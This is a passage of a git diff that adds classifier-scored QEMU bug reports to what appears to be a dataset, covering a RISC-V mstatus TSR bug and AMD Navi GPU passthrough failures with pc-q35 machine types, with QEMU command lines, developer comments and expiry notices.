ide-cd,bus=ide.1,unit=0,drive=drive-ide2,id=ide2,bootindex=200 -drive file=/disk02/prox/images/102/vm-102-disk-0.raw,if=none,id=drive-virtio0,cache=writeback,format=raw,aio=threads,detect-zeroes=on -device virtio-blk-pci,drive=drive-virtio0,id=virtio0,bus=pci.0,addr=0xa,bootindex=100 -drive file=/dev/disk/by-id/ata-WDC_WD80EMAZ-00WJTA0_7SGZLHYC-part1,if=none,id=drive-virtio1,cache=writeback,format=raw,aio=threads,detect-zeroes=on -device virtio-blk-pci,drive=drive-virtio1,id=virtio1,bus=pci.0,addr=0xb -netdev type=tap,id=net0,ifname=tap102i0,script=/var/lib/qemu-server/pve-bridge,downscript=/var/lib/qemu-server/pve-bridgedown,vhost=on -device virtio-net-pci,mac=1e:be:cb:0b:6f:13,netdev=net0,bus=pci.0,addr=0x12,id=net0,bootindex=300 -netdev type=tap,id=net1,ifname=tap102i1,script=/var/lib/qemu-server/pve-bridge,downscript=/var/lib/qemu-server/pve-bridgedown,vhost=on -device virtio-net-pci,mac=EA:76:56:16:2F:D7,netdev=net1,bus=pci.0,addr=0x13,id=net1,bootindex=301 -rtc driftfix=slew,base=localtime -machine type=pc -global kvm-pit.lost_tick_policy=discard + +The QEMU project is currently considering to move its bug tracking to +another system. For this we need to know which bugs are still valid +and which could be closed already. Thus we are setting older bugs to +"Incomplete" now. + +If you still think this bug report here is valid, then please switch +the state back to "New" within the next 60 days, otherwise this report +will be marked as "Expired". Or please mark it as "Fix Released" if +the problem has been solved with a newer version of QEMU already. + +Thank you and sorry for the inconvenience. + + +[Expired for QEMU because there has been no activity for 60 days.] + diff --git a/results/classifier/108/other/1851939 b/results/classifier/108/other/1851939 new file mode 100644 index 000000000..b2881cdda --- /dev/null +++ b/results/classifier/108/other/1851939 
@@ -0,0 +1,36 @@ +semantic: 0.781 +device: 0.768 +performance: 0.721 +other: 0.672 +network: 0.629 +graphic: 0.625 +permissions: 0.623 +socket: 0.600 +files: 0.512 +vnc: 0.479 +debug: 0.421 +boot: 0.380 +KVM: 0.350 +PID: 0.342 + +RISC-V mstatus TSR bit not correctly implemented + +Hi, + +since qemu 4.1.0 the TSR bit in mstatus register is supported. But it does not allow for executing sret in m-mode. + +From the RISC-V specifications: +"When TSR=1, attempts to execute SRET while executing in S-mode will raise an illegal instruction +exception. When TSR=0, this operation is permitted in S-mode." + +This means an exception should only be raised when executing in S-mode, but not in M-mode, hence you should change the condition in helper_sret (target/riscv/op_helper.c) from: + if (env->priv_ver >= PRIV_VERSION_1_10_0 && + get_field(env->mstatus, MSTATUS_TSR)) +to: + if (env->priv_ver >= PRIV_VERSION_1_10_0 && + get_field(env->mstatus, MSTATUS_TSR) && !(env->priv >= PRV_M)) + +Fixed here: +https://git.qemu.org/?p=qemu.git;a=commitdiff;h=ed5abf46b3c4 + + diff --git a/results/classifier/108/other/1851972 b/results/classifier/108/other/1851972 new file mode 100644 index 000000000..966e2c4f8 --- /dev/null +++ b/results/classifier/108/other/1851972 
@@ -0,0 +1,137 @@ +KVM: 0.700 +permissions: 0.605 +other: 0.554 +vnc: 0.552 +graphic: 0.451 +performance: 0.446 +network: 0.437 +boot: 0.423 +device: 0.413 +debug: 0.403 +socket: 0.389 +files: 0.381 +PID: 0.332 +semantic: 0.311 + +pc-q35-4.1 and AMD Navi 5700/XT incompatible + +Hello, + +I am not sure if this qualifies as a "bug"; it is be more of an unknown issue with default settings. However, since the default value of q35 default_kernel_irqchip_split was changed seemingly due to similar user feedback, I thought this was important to share.. + +AMD Navi 5700/XT vfio-pci passthrough seems incompatible with one/multiple settings in pc-q35-3.1 and higher. The workaround for me is that pc-q35-3.0 still works fine passing through the GPU and official drivers can load/install fine. + +The default/generic GPU drivers in a Fedora 30 or Windows 1903 guest do work; the monitor displays the desktop in a 800x600 resolution and things are rendered fine.. so the basic functionality of the card seems fine with pc-q35-4.1. + +But attempting to use the official open source AMD driver with the card resulted in a hung kernel for the Fedora 30 guest.. and a BSOD on the Windows 1903 guest immediately during driver install. + +I do not see any errors in Qemu command output.. did not investigate other logs or KVM etc, because I am not sure what to look for or how to go about it. Also not sure which combination of the latest q35 default settings are valid combinations to try either, because it seems that multiple things have changed related to pcie-root-port defaults and other machine options. I am happy to run tests and provide feedback if that helps identify the issue. + +I am using "Linux arch 5.4.0-rc6-mainline" kernel on ArchLinux host with AMD Navi reset pci quirk patch applied. 
+ +My working Qemu command line is this: + +QEMU_AUDIO_DRV=pa \ +QEMU_PA_SERVER=/run/user/1000/pulse/native \ +/usr/bin/qemu-system-x86_64 \ +-name windows \ +-m 16g \ +-accel kvm \ +-machine pc-q35-3.0,accel=kvm,pflash0=ovmf0,pflash1=ovmf1 \ +-blockdev node-name=ovmf0,driver=file,filename=/virt/qemu/roms/OVMF_CODE.fd,read-only=on \ +-blockdev node-name=ovmf1,driver=file,filename=/virt/qemu/machines/windows/OVMF_VARS.fd \ +-boot menu=on \ +-global kvm-pit.lost_tick_policy=discard \ +-no-hpet \ +-rtc base=utc,clock=host,driftfix=slew \ +-cpu host,kvm=off,hv_vendor_id=RedHatRedHat,hv_spinlocks=0x1fff,hv_vapic,hv_time,hv_reset,hv_vpindex,hv_runtime,hv_relaxed,hv_synic,hv_stimer \ +-smp sockets=1,cores=4,threads=1 \ +-nodefaults \ +-netdev bridge,br=br0,id=net0 \ +-device virtio-net-pci,netdev=net0,addr=19.0,mac=52:54:00:12:34:77 \ +-device virtio-scsi-pci \ +-blockdev raw,node-name=disk0,cache.direct=off,discard=unmap,file.driver=file,file.aio=threads,file.filename=/virt/qemu/machines/windows/os.raw \ +-device scsi-hd,drive=disk0,rotation_rate=1 \ +-blockdev raw,node-name=disk1,cache.direct=off,discard=unmap,file.driver=file,file.aio=threads,file.filename=/virt/qemu/machines/windows/data.raw \ +-device scsi-hd,drive=disk1,rotation_rate=1 \ +-drive index=0,if=ide,media=cdrom,readonly,file=/virt/qemu/isos/Win10_1903_V2_English_x64.iso \ +-drive index=1,if=ide,media=cdrom,readonly,file=/virt/qemu/isos/virtio-win-0.1.173.iso \ +-device ich9-intel-hda,addr=1b.0 \ +-device hda-output \ +-monitor stdio \ +-display none \ +-vga none \ +-device pcie-root-port,id=pcierp0,chassis=1,slot=1,addr=1c.0,disable-acs=on,multifunction=on \ +-device pcie-root-port,id=pcierp1,chassis=2,slot=2,addr=1c.1,disable-acs=on \ +-device x3130-upstream,bus=pcierp0,id=pcieu0 \ +-device xio3130-downstream,bus=pcieu0,id=pcied0,chassis=11,slot=11 \ +-device vfio-pci,host=03:00.0,bus=pcied0,addr=00.0,multifunction=on \ +-device vfio-pci,host=03:00.1,bus=pcied0,addr=00.1 \ +-device qemu-xhci,addr=1d.0 \ 
+-device usb-host,vendorid=0x258a,productid=0x0001 \ +-device usb-host,vendorid=0x1bcf,productid=0x0005 ; + +Thank you! + +Paolo Bonzini commented on IRC: AMD avic requires kernel_irqchip=split. + +Can you try using it? (released QEMU uses -machine ...,kernel_irqchip=split, git QEMU expects -accel kernel_irqchip=split). + +Hi Philippe, thanks for replying. + +The 'kernel_irqchip' parameter is a bit confusing to me. It looks like the documentation was updated from it defaulted to 'off' as a -machine parameter, to now it will default to 'on' as an -accel parameter. + +This bug described how the value for 'default_kernel_irqchip_split' parameter had been changed to 'true' in Q35 version 4.0, but then set back to 'false' after discovering that it caused issues for Nvidia gpu passthrough and other things: https://bugs.launchpad.net/qemu/+bug/1826422 + +However, my problems with the AMD gpu passthrough are present when switching between Q35 3.0 (which does work) and 3.1 (which does not work), both of which would still have 'default_kernel_irqchip_split' set to false.. so it does not seem to me to be related to 'kernel_irqchip'. + +Q35 version 3.1 did introduce many other changes: + +static void pc_q35_3_1_machine_options(MachineClass *m) +{ +.. + pcmc->do_not_add_smb_acpi = true; + m->smbus_no_migration_support = true; + m->alias = NULL; + pcmc->pvh_enabled = false; +.. + +GlobalProperty hw_compat_3_1[] = { + { "pcie-root-port", "x-speed", "2_5" }, + { "pcie-root-port", "x-width", "1" }, +.. + +I thought maybe those could cause the AMD Navi gpu problems, but I am not that knowledgeable about these settings. + +Also I do not have the AMD Navi gpu conveniently available anymore to test. + +Commit 11bc4a13 (Nov 13, 2019, merged after v4.2.0-rc5) moved the kernel-irqchip parameter to -accel, but I think the default was inadvertently changed to off. The documentation was changed to say the default is on, but the code change seems to have done the opposite. 
+ +I found this when I tested my Windows Server 2016 VMs with the last qemu from git. Windows boots and runs very slowly unless I add either <ioapic driver='kvm'/> (kernel_irqchip=on) or <timer name="hypervclock" present="yes"/> to the libvirt config. Using the qemu installed with Ubuntu 19.10 (version 4.0.0), I can reproduce the slowness by explicitly adding kernel_irqchip=off. + +Details: +- Host CPU: Ryzen 3950X (16 core, 32 thread) +- Host RAM: 64 GiB +- Host OS: Ubuntu 19.10 64-bit, kernel version 5.5.0-rc4 (commit 738d2902773e + ACS override patch) +- Guest CPU: host-passthrough, 16 vcpus (8 cores, 2 threads, topoext). +- Guest RAM: 12 GiB +- Guest machine type: pc-i440fx-4.0 (BIOS boot) +- Guest OS: Windows Server 2016, build 1607 + +Commit d1972be13f ("accel/kvm: Make "kernel_irqchip" default on") fixes the default mixup I described above. This isn't related to Marshall's issue as it involves qemu 3.0 vs 3.1, but at least it cleans up some confusion. + +The QEMU project is currently considering to move its bug tracking to +another system. For this we need to know which bugs are still valid +and which could be closed already. Thus we are setting older bugs to +"Incomplete" now. + +If you still think this bug report here is valid, then please switch +the state back to "New" within the next 60 days, otherwise this report +will be marked as "Expired". Or please mark it as "Fix Released" if +the problem has been solved with a newer version of QEMU already. + +Thank you and sorry for the inconvenience. + + +[Expired for QEMU because there has been no activity for 60 days.] + |